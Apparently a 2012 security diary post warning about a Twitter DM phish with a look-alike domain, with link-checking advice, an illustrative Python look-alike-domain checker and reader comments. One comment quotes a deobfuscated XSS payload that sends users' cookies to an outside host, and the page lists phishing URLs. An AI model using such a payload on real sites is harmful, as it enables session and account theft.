It's Phishing Season! In fact, it's ALWAYS Phishing Season!
It's always great to hear from our readers. We just got this note in from Tom on a phish that he recently encountered:
One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:
hilarious pic! bit.ly/KIbUqq
That bit.ly URL redirects to:
http://tvviiter.com/log-in/q2/?session_timeout=iajb864?emgzw
That site is clearly impersonating the Twitter.com site, and attempts to trick users into typing in their username and password. As of this writing (May 30, 2012 12:18pm EDT), the site is still available.
The whois record shows it as registered to "XIN NET TECHNOLOGY CORPORATION" in Shanghai, China. The whois record also has an HTML "script" tag in it, which may be an attempt to XSS users using web-based WHOIS services (though I did not try loading the JS file to find out).
While I've certainly seen reply spam on Twitter, I don't recall ever seeing this type of DM spam leading to phishing before. I thought that you guys might find it interesting!
I sent a message using Twitter's online support form, and I also submitted the URL to Google's SafeBrowsing list.
This was just too good an example to pass up writing about. Things to watch out for:
- Any link you're asked to click on, in any context, is a risk - READ THE UNDERLYING LINK to verify that you're going where you think you are.
- If it's a shortened link (bit.ly or whatever), check it with a sacrificial VM or from a sandboxed browser that you trust is actually partitioned and "safe".
- Before you click the link - READ THE LINK AGAIN - the "vv" instead of a "w" character in "twitter" is a nice touch, easy to miss.
- Finally, before clicking the link, DON'T CLICK THE LINK. Cut and paste it into your browser rather than clicking it directly.
If you've got any other pointers, or if I've missed anything, please use our comment form to... well... comment!
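As an added illustration of the "read the underlying link" advice (example code, not from the diary or from ISC), the check below flags a shortened link as one that must be expanded before it can be judged, and compares the registered domain of a full URL against a short brand list after mapping look-alike character pairs such as "vv" for "w". The brand list, shortener list and confusable pairs are assumptions constructed for this example; the two URLs tested are the ones quoted in Tom's note.

```python
"""Lookalike-domain check for links like the tvviiter.com one in this diary."""
from urllib.parse import urlsplit

# Brands we want to protect; constructed list for this example.
PROTECTED_BRANDS = {"twitter.com", "yahoo.com", "google.com"}

# Hosts that hide the real destination; expand these (in a sandbox) before judging.
SHORTENERS = {"bit.ly", "t.co", "goo.gl", "tinyurl.com"}

# Character sequences that look alike in common fonts (assumed confusable pairs).
CONFUSABLES = [("vv", "w"), ("rn", "m"), ("cl", "d"), ("0", "o"), ("1", "l")]


def registered_domain(url: str) -> str:
    """Return the last two host labels, e.g. 'tvviiter.com' (ignores co.uk-style suffixes)."""
    if "://" not in url:
        url = "http://" + url          # bare 'bit.ly/KIbUqq' style links
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def normalize(domain: str) -> str:
    """Replace confusable sequences with the character they imitate."""
    for fake, real in CONFUSABLES:
        domain = domain.replace(fake, real)
    return domain


def levenshtein(a: str, b: str) -> int:
    """Edit distance, so 'twiiter.com' is one step from 'twitter.com'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str) -> str:
    """'shortened', 'legitimate', 'lookalike of <brand>' or 'unknown'."""
    dom = registered_domain(url)
    if dom in SHORTENERS:
        return "shortened"
    if dom in PROTECTED_BRANDS:
        return "legitimate"
    norm = normalize(dom)
    for brand in sorted(PROTECTED_BRANDS):
        if levenshtein(norm, brand) <= 1:
            return f"lookalike of {brand}"
    return "unknown"
```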
===============
Rob VandenBrink
Metafore
Comments
AndrewB
May 30th 2012
Elliot
May 30th 2012
http://www.getlinkinfo.com/
http://longurl.org/
bartblaze
May 30th 2012
For example, Yahoo users were/are targeted as follows: they receive a mail from someone they know asking them to click on a link such as hxxp://www.news15jo.net/biz/ (other hostnames include www.news15de.net and www.inews15ny.net, many more will probably exist, each of them currently resolving to 190.123.43.180, 77.79.14.249, 77.79.13.19, 193.107.19.215, 190.123.43.85, 193.107.19.185, 190.123.43.85, 50.7.246.171). My source (in Dutch): http://www.security.nl/artikel/41676/1/Gevaarlijke_site_als_url_in_de_mail.html
hxxp://www.news15jo.net/biz/ looks like a news site; however, "get rich quick" is all over the place. For anyone who trusts these guys:
"How A single Mom from [location obtained from http://j.maxmind.com/app/geoip.js] unlocked a gold mine and is turning huge profits from home."
Just Google for (including the double quotes): "How A single Mom from" "unlocked a gold mine and is turning huge profits from home."
In between the calls to various websites the following is interesting (simplified by me):
GET /forumCreation/createNewForum?p=aaaa [followed by obfuscated stuff including, deobfuscated: onmousemove="document.location.href='http://trackuk.net/ru/tracking.php?ex='.concat(escape(document.cookie)) ]
Host: kr.kpost.yahoo.com
Referer: http://www.news15jo.net/biz/toto.php
I've not fully investigated this (didn't see any drive-by malware, but some netizens report otherwise). However I assume that if you're still logged on to Yahoo and you click the link, a thread on the KPost (Korea) forum is created by _you_ followed by some magic that causes you to spam everyone in your Yahoo address list.
PS1 NoScript in Firefox cries XSS.
PS2 Google for "/forumCreation/createNewForum?p=aaaa" (including the double quotes) results in a lot of recent urlquery.net hits.
PS3 Apparently this has been going on for some time now, see http://www.workathometruth.com/herman-cain-email-spam-used-by-scammers-to-push-home-business-scams/
Bitwiper
May 30th 2012